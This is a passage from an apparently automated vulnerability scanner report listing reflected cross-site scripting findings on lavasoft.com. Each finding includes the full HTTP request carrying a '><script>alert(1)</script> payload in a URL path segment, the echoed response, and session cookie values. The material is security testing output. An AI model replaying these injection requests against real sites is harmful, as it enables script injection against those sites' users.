Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18240
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules8570e'><script>alert(1)</script>ce7e18db5c1/system/defaults.css'>
...[SNIP]...

1.200. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63e8b'><script>alert(1)</script>c48b6ddd3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system63e8b'><script>alert(1)</script>c48b6ddd3ab/defaults.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18202
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system63e8b'><script>alert(1)</script>c48b6ddd3ab/defaults.css'>
...[SNIP]...

1.201. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19bd4'><script>alert(1)</script>08090652a8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system/defaults.css19bd4'><script>alert(1)</script>08090652a8b?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18202
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system/defaults.css19bd4'><script>alert(1)</script>08090652a8b'>
...[SNIP]...

1.202. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4100d'><script>alert(1)</script>f6e60007ec8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft4100d'><script>alert(1)</script>f6e60007ec8/modules/system/system-menus.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10635
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft4100d'><script>alert(1)</script>f6e60007ec8/modules/system/system-menus.css?w'>
...[SNIP]...

1.203. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab356'><script>alert(1)</script>4322317a08b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modulesab356'><script>alert(1)</script>4322317a08b/system/system-menus.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18248
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modulesab356'><script>alert(1)</script>4322317a08b/system/system-menus.css'>
...[SNIP]...

1.204. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7668'><script>alert(1)</script>dd59b0cd693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/systema7668'><script>alert(1)</script>dd59b0cd693/system-menus.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18210
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/systema7668'><script>alert(1)</script>dd59b0cd693/system-menus.css'>
...[SNIP]...

1.205. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 11aec'><script>alert(1)</script>9250b34dab5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system/system-menus.css11aec'><script>alert(1)</script>9250b34dab5?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18210
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system/system-menus.css11aec'><script>alert(1)</script>9250b34dab5'>
...[SNIP]...

1.206. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e9be'><script>alert(1)</script>939406975b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft4e9be'><script>alert(1)</script>939406975b6/modules/system/system.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10629
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft4e9be'><script>alert(1)</script>939406975b6/modules/system/system.css?w'>
...[SNIP]...

1.207. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 806ea'><script>alert(1)</script>eb3bcf32647 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules806ea'><script>alert(1)</script>eb3bcf32647/system/system.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules806ea'><script>alert(1)</script>eb3bcf32647/system/system.css'>
...[SNIP]...

1.208. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f333f'><script>alert(1)</script>8c4d44176a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/systemf333f'><script>alert(1)</script>8c4d44176a9/system.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18198
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/systemf333f'><script>alert(1)</script>8c4d44176a9/system.css'>
...[SNIP]...

1.209. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4b7b'><script>alert(1)</script>d12d2c52918 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system/system.cssf4b7b'><script>alert(1)</script>d12d2c52918?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18198
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system/system.cssf4b7b'><script>alert(1)</script>d12d2c52918'>
...[SNIP]...

1.210. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7ba62'><script>alert(1)</script>b152347a317 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft7ba62'><script>alert(1)</script>b152347a317/modules/user/user.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft7ba62'><script>alert(1)</script>b152347a317/modules/user/user.css?w'>
...[SNIP]...

1.211. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faf8b'><script>alert(1)</script>aac192f3126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modulesfaf8b'><script>alert(1)</script>aac192f3126/user/user.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
